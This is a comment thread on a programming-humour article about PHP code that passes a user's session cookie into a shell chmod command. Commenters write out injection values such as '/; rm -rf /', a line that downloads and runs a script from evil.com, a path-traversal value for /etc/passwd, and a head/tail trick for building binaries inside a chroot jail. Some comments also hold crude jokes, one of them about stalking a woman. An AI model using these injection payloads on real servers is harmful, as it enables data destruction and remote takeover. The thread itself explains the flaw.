• yet another sock puppet (unregistered) in reply to Zyclone
    Zyclone:
    You are all a bunch of easily amused idiots.
    I'm just glad we have so many astute readers who know enough about *nix systems to make sure that the error in the featured comment gets pointed out (time after time)! Of course an error like that is too important to trust that someone else might have already pointed it out (several times), or to waste my time scanning the comments to see if someone else really has said exactly what I am about to say (several times) already!!

    Btw, I don't think its been pointed out enough already - the chmod command lacks the -r flag to make it recursive, and there are plenty of ways to send a custom cookie to the web server, and you can't just run whatever you want on the server because its probably running as a restricted user which has no access to anything except web pages :)

  • Dani (unregistered) in reply to Konstantin
    Konstantin:
    I don't fully understand this. Why is that bad?

    What if my cookie is

    /; rm -rf /

  • Wait (unregistered)

    Wait, Guys, what if my cookie is "/; rm -rf /"!?

  • (cs) in reply to Dani
    Dani:
    Konstantin:
    I don't fully understand this. Why is that bad?

    What if my cookie is

    /; rm -rf /
    Imagine what would happen if your cookie looked like this:

    /; #######D~~~  ( * )  :-O LOL OMG

    Filed Under: trollin trollin trollin, not a link

  • Zuy Incognito (unregistered) in reply to C-Octothorpe
    C-Octothorpe:
    Dani:
    Konstantin:
    I don't fully understand this. Why is that bad?

    What if my cookie is

    /; rm -rf /
    Imagine what would happen if your cookie looked like this:

    /; #######D~~~  ( * )  :-O LOL OMG

    Filed Under: trollin trollin trollin

    When I was a lad, I had a very different idea of what "Rawhide" meant.

    trollin' trollin' trollin' keep those tissues comin' trollin' trollin' trollin' base-ment!

  • Thewiseguy (unregistered)

    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.

  • (cs)

    We need more security related WTFs because this is a topic that the vast majority of developers don't understand but they damn well should.

  • (cs) in reply to Zuy Incognito
    Zuy Incognito:
    C-Octothorpe:
    Dani:
    Konstantin:
    I don't fully understand this. Why is that bad?

    What if my cookie is

    /; rm -rf /
    Imagine what would happen if your cookie looked like this:

    /; #######D~~~  ( * )  :-O LOL OMG

    Filed Under: keep trollin' trollin' trollin'

    When I was a lad, I had a very different idea of what "Rawhide" meant.

    trollin' trollin' trollin' keep those tissues comin' trollin' trollin' trollin' base-ment!

    I didn't even think of that song... I was going for the [puke] Limp Bizkit song.

  • Alex (unregistered) in reply to Machtyn

    Or, really frustrate the admins of the site.

    Set the sessionid cookie to both /bin/su and /usr/bin/sudo. This will clear the suid flag on those programs, and prevent them from working.

    However, this hole assumes that PHP is running as a privileged user. Granted, it probably is...

    CAPTCHA: venio - I am arriving

  • (cs) in reply to Thewiseguy
    Thewiseguy:
    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
    Are you new here?
  • JoeBob (unregistered) in reply to Machtyn

    Easier than that actually, just act as an http client to the site and tell it in the http protocol that you have a cookie named sessionid with the value of "/"

  • Zuy Incognito (unregistered) in reply to C-Octothorpe
    C-Octothorpe:
    Zuy Incognito:
    C-Octothorpe:
    Dani:
    Konstantin:
    I don't fully understand this. Why is that bad?

    What if my cookie is

    /; rm -rf /
    Imagine what would happen if your cookie looked like this:

    /; #######D~~~  ( * )  :-O LOL OMG

    Filed Under: keep trollin' trollin' trollin'

    When I was a lad, I had a very different idea of what "Rawhide" meant.

    trollin' trollin' trollin' keep those tissues comin' trollin' trollin' trollin' base-ment!

    I didn't even think of that song... I was going for the [hugs] Limp Bizkit song.
    I don't even know what you're referring to, but I think I like it that way.

    Oh well, enjoy your limp biscuits.

  • (cs) in reply to Thewiseguy
    Thewiseguy:
    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
    I prefer the term "haunting".
  • Zuy Incognito (unregistered) in reply to C-Octothorpe
    C-Octothorpe:
    Thewiseguy:
    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
    I prefer the term "haunting".
    That's what I said to some chick on the other floor who accused me of "stalking". Hiding in the dark and watching you while you can't see them in places you thought were private - isn't that what ghosts do?
  • (cs) in reply to Zuy Incognito
    Zuy Incognito:
    C-Octothorpe:
    Thewiseguy:
    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
    I prefer the term "haunting".
    That's what I said to some chick on the other floor who accused me of "stalking". Hiding in the dark and watching you while you can't see them in places you thought were private - isn't that what ghosts do?
    If you're made entirely of plasma, then I don't think she has a case...
  • JTtheGeek (unregistered) in reply to Machtyn

    It's much worse than that... though that alone is pretty bad. But this is pipping in a user variable into a system executed command. Add a pipe or secondary statement after the chmod to download some executable binary and run it on the host system and total control. Modifying the sessionid is trivial at best. Let's just hope that the sessionid was generated through some crypto routine that they can do a hash check and ensure it hasn't been tampered. Either way, this is pretty bad.

  • chao.mu (unregistered) in reply to Machtyn

    The chmod doesn't matter. The important part is you can execute arbitrary commands. For example, using a simple utility like curl to make a request with custom headers values, the contents of $_COOKIE["$sessionid"] could become '; wget http://evil.com/evil.sh; sh evil.sh" As in, you just got the server to download your script and run it, unleashing whatever evils lurk inside.

  • Zuy Incognito (unregistered) in reply to C-Octothorpe
    C-Octothorpe:
    Zuy Incognito:
    C-Octothorpe:
    Thewiseguy:
    This forum is getting inundated with trolls. If Alex doesn't clean up some of these comments, the site is going to look like a wtf.
    I prefer the term "haunting".
    That's what I said to some chick on the other floor who accused me of "stalking". Hiding in the dark and watching you while you can't see them in places you thought were private - isn't that what ghosts do?
    If you're made entirely of plasma, then I don't think she has a case...
    Plasma, eh? Maybe that's why she can't stand my touch: too hot for her! I'll mention it next time I see her in the bathroom.
  • confuzzled (unregistered)

    Not thinking about the vulnerabilities..... but I'm just trying to figure out a legitimate reason to chmod anything based on user input. Maybe there is a scenario but I'm coming up blank.

  • Franky D (unregistered) in reply to Machtyn

    Uh no "$sessionid" would be the same as saying $sessionid, if it were '$sessionid' it'd be different, but this isn't really a vulnerability unless $sessionid is set by a GET/POST var. Shame on the editors.

  • Adam (unregistered) in reply to frits
    frits:
    C language is for cookie that's good enough for me.
    [image]
  • taboo (unregistered)

    lets play mess up the system

    $_COOKIE["$sessionid"] = "/ ; rm -fr /*";

    system("chmod 777 " . $_COOKIE["$sessionid"]);

  • (cs) in reply to C-Octothorpe
    C-Octothorpe:
    Filed Under: trollin trollin trollin, not a link
    Hey... I tried to click on your link, but it didn't do anything. I think this site is broken, or possibly my browser?

    Addendum (2011-10-13 18:52): edit: I once chmod'd everything on my own system to 777 by accident. I had just installed Linux on said system, though, and I was a noob. So I just wiped it and reinstalled. Anyway, the results were... not pretty.

  • ToAmOrNotToAmArmid (unregistered)

    Not sure, if someone's else submission ((FRY)) Or my submission heavily anonymized

    Let's just say, the cookies do not matter, some people use this system-chmod construct with a session id transferred with everything else over GET.

  • Nagesh (unregistered) in reply to Smitt-Tay
    Smitt-Tay:
    OK, so explain how a web server running in a chroot jail as a non-root user has any problem coping with this.
    Even if we assume this, we know that the jail in question provides its inmates with access to at least (a) a shell, and (b) a chmod binary. It is not a large leap of faith to assume that it will also provide some way to produce a file with arbitrary binary content. There may not be any wget and curl binaries around, but it's amazing what you can achieve with repeated applications of, say,
        head -c 12345 /bin/chmod | tail -c 1 >> foo
    
    if you have the ability to inject shell commands into the jail. Obviously we have the ability to set the execute bit on the file we create, which completely subverts a major point of chrooting, namely the tight control of which binaries an attacker has access to.

    This gives you the ability to do everything the non-root daemon user can do -- such as talk to other servers (at least the database) over the network, or snoop on any private user data the web server needs to have access to. You may have to run your criminal empire from jail, but that doesn't mean you can't have one.

    Chrooting at best only stops the infection from spreading -- it does not prevent you from being infected in the first place.

    (And that is quite apart form the obvious fact that a hole like this turns any local privilege escalation into a remote rooting).

  • (cs) in reply to asdf
    asdf:
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    So, if I understand this correctly, all you'd need to do is set the cookie to "/; rm -rf /" to see if whoever was responsible for this mess thought to make backups.

    Yeah. Shell access via cookies. Cookie monster just got a whole new meaning. I'll remember that snippet. You never know... ;)

  • (cs) in reply to simple_fix
    simple_fix:
    I suppose the Armid would have only read one line. The full code snippet might be something like this.

    if (( is_file($_COOKIE["$sessionid"] ) && ( strcmp(dirname($_COOKIE["$sessionid"]), "/tmp/session_ids") == 0) ) { ... ... ... system("chmod 777 " . $_COOKIE["$sessionid"]); ... ... } else { // handle the invalid sessionid here }

    So stop read single line of code and try to understand the big picture.

    And seriously what is a tester doing looking up at the source code? Is he a tester or a code reviewer / auditor?

    sessionid = ../../../../../../../../etc/passwd

  • (cs) in reply to yet another sock puppet
    yet another sock puppet:
    Zyclone:
    You are all a bunch of easily amused idiots.
    I'm just glad we have so many astute readers who know enough about *nix systems to make sure that the error in the featured comment gets pointed out (time after time)! Of course an error like that is too important to trust that someone else might have already pointed it out (several times), or to waste my time scanning the comments to see if someone else really has said exactly what I am about to say (several times) already!!

    Btw, I don't think its been pointed out enough already - the chmod command lacks the -r flag to make it recursive, and there are plenty of ways to send a custom cookie to the web server, and you can't just run whatever you want on the server because its probably running as a restricted user which has no access to anything except web pages :)

    If the code is written like so, wanna bet that configuration is not much better? And I bet that selinux (or a similar scheme) is turned off as well, beacuse it's just too complicated and "gets in the way". Yeah. Whatever obstacles are there, by design, against admin/devel stupidity, will be quickly worked around until "things just work".

  • Joe (unregistered) in reply to Machtyn

    Actually, you wouldn't be able to give extra permissions to anything you didn't already have permissions to. You can't chmod anything you don't own unless you are root, and if their webservice runs as root, that would be it's own super sized security problem.

    However, you could probably do this: $_COOKIE["$sessionid"] = "xx ; <any commandline tool>"

    This would be free rain to execute anything you wanted, including any ruby, python, perl interpreter that might be on the system.

  • Me (unregistered) in reply to Machtyn

    Well, I've never actually tried, but just poking around shows the presence of a "cookies.sqlite" file in my firefox directory. So changing that value should be as simple as opening up that sqlite file using sqlite, finding the cookie, set by the site, with the name that looks suspiciously like a PHP session id, and then changing the value to whatever you want it to be.

    I could also be wrong.

  • Cheong (unregistered) in reply to asdf

    While I agree this is bad, your comment assumes that this web server is not running in its default account ("apache" or "nobody" in apache, or "IUSR_*" / "NetworkService" in IIS.

    If SELinux/chroot jail has been enabled, the damage could be done would have been even more limited.

    That's why despite many administrators claim SELinux difficult to use, they should still configure and use it if it's available.

  • (cs) in reply to Rosuav
    Rosuav:
    Making it [sudo] -rwxrwxrwx (as this command would do) means it'll run as your current login, the way most executables do... which means it's now pretty much impossible to recover the system. Yep, you're gonna have to take the system down, boot some other media, and *MAYBE* then you'll be able to patch things up.

    Okay, I understand that point, more or less. Seems a bit irrelevant though, because after I follow through with that "rm -rf", you're kinda gonna to have to boot off of some other media anyway.

  • q0dr (unregistered) in reply to Machtyn

    Actually, it would be worse to set $_COOKIE["$sessionid"] to "-R /". Alternatively, set it to "/* // ///* ////" (which should cover most of the important files - assuming you didn't blow out the shell.

  • jc (unregistered) in reply to Machtyn

    depends on who the php process runs under

  • sh code (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    I could be wrong, but Celina Nunes hints at the problem:

    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Yay! Free access to a linux system and every single file! Including root access, hash files, configurations, ... everything. Want to setup a zombie? There's your system.

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    this. there will be a sessionid=something in the cookie in a plain text. modifying the "something" to "/" would make whole directory tree on server readable+writable+executable by everyone. at that point it becomes public property, afaik.

    (also, the fact that chmod gets variable named "sessionid" as a parameter hints to user's folder on server, which may mean that folder of every user is rwx for everyone by default, you don't even have to tamper with cookies)

  • +9 (unregistered)

    Oh, yes. 'system' in PHP code, must have, hehe.

  • David Martensson (unregistered) in reply to Machtyn

    What if $sessionid contains something like

    $sessionid = "rm /"; (or some more evil code) Would not th inner command be executed before the chmod then?

    system("chmod 777 " . $_COOKIE["$sessionid"]);

  • DJMaze (unregistered) in reply to Machtyn

    The real WTF is $_COOKIE["$sessionid"] It should be written as $_COOKIE[$sessionid]

  • craig (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    I could be wrong, but Celina Nunes hints at the problem:

    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Yay! Free access to a linux system and every single file! Including root access, hash files, configurations, ... everything. Want to setup a zombie? There's your system.

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    Surely this will simply change the permissions on the root directory. In order to be recursive, (at least in Linux systems using GNU chmod) you require the "-R" flag to chmod.

    This simply makes a single chosen file (or directory) rwx for everyone

  • meh (unregistered) in reply to dguthurts
    dguthurts:
    ...

    42: look to see if they're stupid enough to have a system call to change file permissions?

    ...

    Nope. More like:

    ... 42: Change sessionID to something else and see what happens ...

    Then if the system is stupid enough to return an error message that gives a clue about the type of security flaw you can imagine what happens.

    Also, you should assume that the attacker has access to the sites code, through another less serious flaw, being previously employed, dumpster diving, being another customer and a million other senarios

  • (cs) in reply to Capt. Obvious
    Capt. Obvious:
    Has anyone mentioned that you should use -R if you're going to chmod recursively?

    Strangely not. I would have expected a few of the more in-the-know types to have picked up on that immediately!

  • (cs) in reply to Nagesh
    Nagesh:
    repeated applications of, say,
        head -c 12345 /bin/chmod | tail -c 1 >> foo
    
    ...

    Repeated applications of head and tail, you say? I'm in! ZING!!

  • (cs) in reply to Joe
    Joe:
    This would be free rain ...

    Free rain? Plenty of that around here. Strontium-fortified, even.

  • Ash Ward (unregistered) in reply to Machtyn

    I think the problem here is much, much worse than just arbitrarily changing permissions. Basically the session_id is derived from a cookie (from the user) and the cookies are form the user. Therefore anyone can inject anything into that system call.

    They could inject for example: ". : rm -rf /" and wipe the server hard drive (assuming the web server has permissions to do so) or run any arbitrary command as the web server.

    Bad bad bad! Gives us developers a bad name!

  • Alec Muffett (unregistered) in reply to Machtyn

    It's much, much worse than that. If the cookie contains "/;rm -rf /" then wave goodbye to a large part of your webserver, if not your entire server...

  • Grammar nazi (unregistered) in reply to frits
    frits:
    I enjoy pointing out whining. This means I actually want more whining so I can point it out. I also enjoy all the Nageshen.

    I also enjoy grammar nitpicking. And I can't help but notice it doesn't make sense that a name supposedly of Indian origin gets pluralized the anglo-saxon way.

  • techpaul (unregistered) in reply to C-Octothorpe
    C-Octothorpe:
    boog:
    C-Octothorpe:
    Ralph:
    If you call yourself a web developer and you didn't see even one thing wrong in the first two seconds of looking at that abomination, please please for the sake of all who have to share your planet, take your mouse and go give it to someone responsible. Yes, right now!

    You can keep your keyboard. After two years of using that exclusively you may have learned enough to get back into web development. If not, there's no hope. Go wash cars or something.

    I think every developer should have their mouse taken away for two years as standard practice so they can learn how to use the shortcuts built into $IDE, which saves a lot of time, really.
    Never mind shortcuts. How about just learning to use the goddamn keyboard? I'm sick and tired of all the point-and-click programmers in this industry. </more-whining-for-frits-to-point-out>
    So very much this...

    One example: I am constantly amazed at how many developers use the VS "designer" when working with ASP.Net apps. I haven't loaded the designer in at least 3 or 4 years. It's funny to get the comments "how do you know what you're looking at" or "how do you add events from controls to the code-behind without double-clicking the event name?".

    It's really amazing how many developers that really and truly have no idea what happens between them writing markup in, lets say ASP.Net, to it rendering to HTML on their browser. How requests and responses work, what headers are, the difference between GET and POST, etc., etc.

    I suppose it's this (perhaps intentional) unknowing that leads to so many security WTFs. I've lost count how many times I've heard "senior" developers say that hidden form fields or using POST is more secure than GET because the user can't change those values. Obviously you've never heard of fiddler or any other proxy tool, eh?

    I raise your point and click monkeys to -

    a) sites where everything is fixed PIXEL deminesions including fonts, usually a max of 10 pixels.

    b) sites set for 800 pixel width with widescreen displays these days

    c) sites using Home.htm(l)

    Worst site I came across had Home.htm and all other pages were sub-directories.

    Each subdirectory had an index.htm that was a copy of the <page name>.htm, that had a subdirectory for the CSS and images (yes copies of them).

    Worst still the contact form contained this

    <form action="/contact" method="post">

    Which at best posted the form data to /contact which on quite a few servers becomes /contact/contact.htm . Oh look the same contact form with blank data.

  • Wonka (unregistered) in reply to dpm
    dpm:
    Machtyn:
    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.
    The chmod command is not recursive by default, and I doubt the webserver process has permission to modify the root directory.

    Oh, thats ok then. No WTF Here.

  • Vinny (unregistered) in reply to Machtyn

    Yay! Free access to a linux system and every single file!

    It's not quite that simple ofcourse. You cannot chmod files you can't already access. So chmodding '/' is just not going to happen.

    Unless PHP runs as the root user, but that's another WTF.

  • Naegsh (unregistered) in reply to Nagesh
    Nagesh:
    Smitt-Tay:
    OK, so explain how a web server running in a chroot jail as a non-root user has any problem coping with this.
    Even if we assume this, we know that the jail in question provides its inmates with access to at least (a) a shell, and (b) a chmod binary. It is not a large leap of faith to assume that it will also provide some way to produce a file with arbitrary binary content. There may not be any wget and curl binaries around, but it's amazing what you can achieve with repeated applications of, say,
        head -c 12345 /bin/chmod | tail -c 1 >> foo
    
    if you have the ability to inject shell commands into the jail. Obviously we have the ability to set the execute bit on the file we create, which completely subverts a major point of chrooting, namely the tight control of which binaries an attacker has access to.

    This gives you the ability to do everything the non-root daemon user can do -- such as talk to other servers (at least the database) over the network, or snoop on any private user data the web server needs to have access to. You may have to run your criminal empire from jail, but that doesn't mean you can't have one.

    Chrooting at best only stops the infection from spreading -- it does not prevent you from being infected in the first place.

    (And that is quite apart form the obvious fact that a hole like this turns any local privilege escalation into a remote rooting).

    You forgot to switch your name from the Nagesh troll to your real one.

    you marachoad

Leave a comment on “The Deadly Cookie”

Log In or post as a guest

Replying to comment #:

« Return to Article